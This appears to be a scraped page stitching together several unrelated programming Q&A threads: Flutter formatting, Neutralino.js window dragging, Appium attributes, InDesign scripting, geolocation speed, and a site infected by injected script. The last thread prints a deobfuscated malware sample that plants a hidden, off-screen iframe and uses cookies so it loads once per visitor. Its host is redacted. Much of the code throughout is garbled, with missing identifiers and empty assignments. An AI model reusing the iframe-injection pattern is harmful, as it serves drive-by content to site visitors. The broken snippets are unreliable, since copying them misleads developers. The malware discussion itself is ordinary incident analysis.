AndroidStudio - Flutter code alignment gets worse - android-studio

AndroidStudio's Flutter code alignment gets worse when using Riverpod and some others. Because of this, code is unreadable and hard to understand at first sight.
I don't know if this is a major issue, but I can't find a solution for it on the Internet.
Are there any hacks or tips?
See the examples
This is what I expect...
if ( != null) {
SharedPreferences pref = await SharedPreferences.getInstance();
String stme = DateFormat('yyyy-MM-dd HH:mm').format(;
pref.setString('pref_shopInST', stme);
pref.setString('pref_selected_dealer',!.drid ?? ""); =
} else {
AppClass().showSnackBar('Please select dealer', context);
The Image is what Ctrl + Alt + L gives...


Positioning the borderless window in neutralino.js

Is there any way we can position the borderless window in the file neutralino.config.json?
like : "borderless": { ...args }
or any other ways?
Now it just starts at somewhere random and cannot be moved
You can call Neutralino.window.move(x,y) in your javascript. (0,0) is the (leftmost,top) of the screen. You can find other window functions at
As an extension of your question, and like Klauss A's instinct suggests, you can call Neutralino.window.setDraggableRegion('id-of-element') where id-of-element is, as the name suggests, an id of an element in your html. Then, when you click and drag that element, Neutralino will automatically call Neutralino.window.move(x,y). setDraggableRegion() is not in the docs, but you can see it in the tutorial they made on YouTube, and it is still in the code.
The thing is, how Neutralino does this is by posting a message to the server, which adds quite a bit of delay, causing the drag to stutter. Here is the relevant code snippet in a prettified version of the neutralino.js file:
t.move = function(e, t) {
return r.request({
url: "window.move",
type: r.RequestType.POST,
isNativeMethod: !0,
data: {
x: e,
y: t
}, t.setDraggableRegion = function(e) {
return new Promise(((t, i) => {
let r = document.getElementById(e),
o = 0,
u = 0;
function s(e) {
return n(this, void 0, void 0, (function*() {
yield Neutralino.window.move(e.screenX - o, e.screenY - u)
r || i(`Unable to find dom element: #${e}`), r.addEventListener("mousedown", (e => {
o = e.clientX, u = e.clientY, r.addEventListener("mousemove", s)
})), r.addEventListener("mouseup", (() => {
r.removeEventListener("mousemove", s)
})), t()
I suspected this formulation of adding to the lag, since function* is a generator, and thus is inherently untrustworthy (citation needed). I re-wrote it in plain javascript, and reduced some of the lag. It still stutters, just not as much.
var dragging = false, posX, posY;
var draggableElement = document.getElementById('id-of-element');
draggableElement.onmousedown = function (e) {
posX = e.pageX, posY = e.pageY;
dragging = true;
draggableElement.onmouseup = function (e) {
dragging = false;
document.onmousemove = function (e) {
if (dragging) Neutralino.window.move(e.screenX - posX, e.screenY - posY);
I hope this helps. I was digging around in all this because the caption bar (aka, title bar) of the window is different from my system's color theme. I thought, "maybe I'll create my own title bar in HTML, with CSS styling to match my app." But due to the stuttering issues, I find it is better to have a natively-draggable title bar that doesn't match anything. I'm still digging around in the Neutralino C++ code to see if I could modify it and add a non-client rendering message handler (on Windows), to color the title bar the same as my app and still have nice smooth dragging. That way it would look "borderless" but still be movable.
I am having the same problem. My naive instinct is telling me that probably could be a way to create a custom element bar and use a function upon click& drag to move the window around.
Moving Windows in Neutralino is Quite Simple.
You can use the Neutralino.window API to move the windows.
Neutralino.window.move(x, y);
here x and y are the Coordinates on which our window will move to.
Note the this moves the window from the Top Left Corner of the window.
I have made this Neutralino Template - NeutralinoJS App With Custom Titlebar which might be useful if you are making a custom titlebar for your application.

Using getAttribute to get the class name of a webelement in Native context

Went through the java docs of getAttribute. Couldn't understand the point mentioned as :
Finally, the following commonly mis-capitalized attribute/property
names are evaluated as expected: "class" "readonly"
Could someone confirm if webElement.getAttribute("class") shall return the class name of the element or not?
Edit : On trying this myself
System.out.println("element " + webElement.getAttribute("class"));
I am getting
Note : The element does exist on the screen as I can perform actions successfully on the element :; //runs successfully
WebElement webElement = <findElement using some locator strategy>;
System.out.println("element " + webElement.getAttribute("class"));
So the answer to the problem was answered on GitHub in the issues list of appium/java-client by #SergeyTikhomirov. Simple solution to this is accessing the className property as following :
webElement.getAttribute("className")); //instead of 'class' as mentioned in the doc
Method core implementation here : AndroidElement
According to this answer, yes you are doing it right. Your org.openqa.selenium.NoSuchElementException is thrown because selenium can't find the element itself.
The sidenote you have posted, about actually working, is unfortunately not included in the code you have posted. Since it is not a part of the actual question, I leave this answer without adressing it.
public String getStringAttribute(final String attr)
throws UiObjectNotFoundException, NoAttributeFoundException {
String res;
if (attr.equals("name")) {
res = getContentDesc();
if (res.equals("")) {
res = getText();
} else if (attr.equals("contentDescription")) {
res = getContentDesc();
} else if (attr.equals("text")) {
res = getText();
} else if (attr.equals("className")) {
res = getClassName();
} else if (attr.equals("resourceId")) {
res = getResourceId();
} else {
throw new NoAttributeFoundException(attr);
return res;

How to set Excel Import Preferences in InDesign CS6 using extendscript?

This seems like it should be really simple, but for some reason I can't get it to work at all. The following code has no effect whatsoever:
function setExcelImportPrefs() {
rangeName = "A1:Z300";
sheetName = "whatever";
tableFormatting = TableFormattingOptions.excelFormattedTable;
And this doesn't work either:
function setExcelImportPrefs() {
app.excelImportPreferences.rangeName = "A1:Z300";
app.excelImportPreferences.sheetName = "whatever";
app.excelImportPreferences.tableFormatting = TableFormattingOptions.excelFormattedTable;
What am I doing wrong? I've Googled everything, and I'm at my wits end. (Note: I have InDesign CS6, version 8.0)
Edit: Put in a bracket that I accidentally left out when I was copying-and-pasting.
I'm not familiar with these settings, but you seem to have be missing a bracket. Just get rid of the with syntax all together and try
function setExcelImportPrefs() {
app.excelImportPreferences.rangeName = "A1:Z300";
app.excelImportPreferences.sheetName = "whatever";
app.excelImportPreferences.tableFormatting = TableFormattingOptions.excelFormattedTable;

geolocalisation is very slow

I've a application for the geolocalisation and I retrieve the current geoposition but the display on the application is VERY slow...
The constructor :
public TaskGeo()
_geolocator = new Geolocator();
_geolocator.DesiredAccuracy = PositionAccuracy.High;
_geolocator.MovementThreshold = 100;
_geolocator.PositionChanged += _geolocator_PositionChanged;
_geolocator.StatusChanged += _geolocator_StatusChanged;
if (_geolocator.LocationStatus == PositionStatus.Disabled)
the code for the display on the app :
void _geolocator_PositionChanged(Geolocator sender, PositionChangedEventArgs args)
// saving and display of the position
App.RootFrame.Dispatcher.BeginInvoke(() =>
this._CurrentPosition = args.Position;
this.lblLon.Text = "Lon: " + this._CurrentPosition.Coordinate.Longitude;
this.lblLat.Text = "Lat: " + this._CurrentPosition.Coordinate.Latitude;
this.LocationChanged(this._CurrentPosition.Coordinate.Longitude, this._CurrentPosition.Coordinate.Latitude);
And the code for the query :
private void LocationChanged(double lat, double lon)
ReverseGeocodeQuery rgq = new ReverseGeocodeQuery();
rgq.GeoCoordinate = new GeoCoordinate(lat, lon);
rgq.QueryCompleted += rgq_QueryCompleted;
How can I improve the code to display faster the position ? Thanks in advance !
Getting this sort of information is basically pretty slow. To quote the great Louis C. K. "It is going to space, give it a second". Because you've specified PositionAccuracy.High this means that the location must be found using GPS, which is comparatively slow, and not any of the faster fallback methods such as using local wi-fi or cell phone towers.
You could reduce your demands for accuracy overall or initially request a lower accuracy and then refine it once the information from the GPS is available. The second option is better. If you look at a map application they typically do this by showing you about where you are and then improving it after the GPS lock is acquired.

what is this script?malware?

I developed a site about a year and half ago.It is very basic and simple html and little javascript.But all of sudden client informed me that his site is black-listed and in google it is showing that "may harm your computer..." msg.I looked into website's view source and noticed some additional scripts are there.I upgraded it to html5 and asked him to delete all previous files and put new files.That's worked fine and made it clear from being black-listed.just now out of curiosity I checked the site, upon visiting a "url not found" message is appearing in one corner,(for the first time only) and in source there are some additional scripts like before.I just copied it form source.
I don't have idea what is this?Is it some malware or what?If it is a some kind of malware, what should I do and how to prevent it?I am afraid if it going to be blacklisted again.
Any idea or advice would be greatly appreciated
Thanks in advance
Confirmed it to be malware - see link below. Seems to be a compromised admin password. First change that.
Is it a Wordpress site? I've heard good things about Better WP security plugin but I'm not too familiar with it.
If not Wordpress - seeing as you say "simple html, little javascript" check for SQL injection possibilities in any forms, etc., change FTP password.
Good luck! malware - Threat Report
after deobfuscation, this is the code you got:
function zkmh09() {
var static='ajax';
var controller='index.php';
var zkmh = document.createElement('iframe');
zkmh.src = ''; = 'absolute'; = '406'; = '406px'; = '406px'; = '1000406'; = '1000406';
if (!document.getElementById('zkmh')) {
document.write('<p id=\'zkmh\' class=\'zkmh09\' ></p>');
function SetCookie(cookieName,cookieValue,nDays,path) {
var today = new Date();
var expire = new Date();
if (nDays==null || nDays==0) nDays=1;
expire.setTime(today.getTime() + 3600000*24*nDays);
document.cookie = cookieName+"="+escape(cookieValue)
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
function GetCookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
return null;
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
if (navigator.cookieEnabled)
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
as you can see it creates an iframe element and send an ajax requests to http://ri******MK.php page. also it has two other function to set and get cookies.
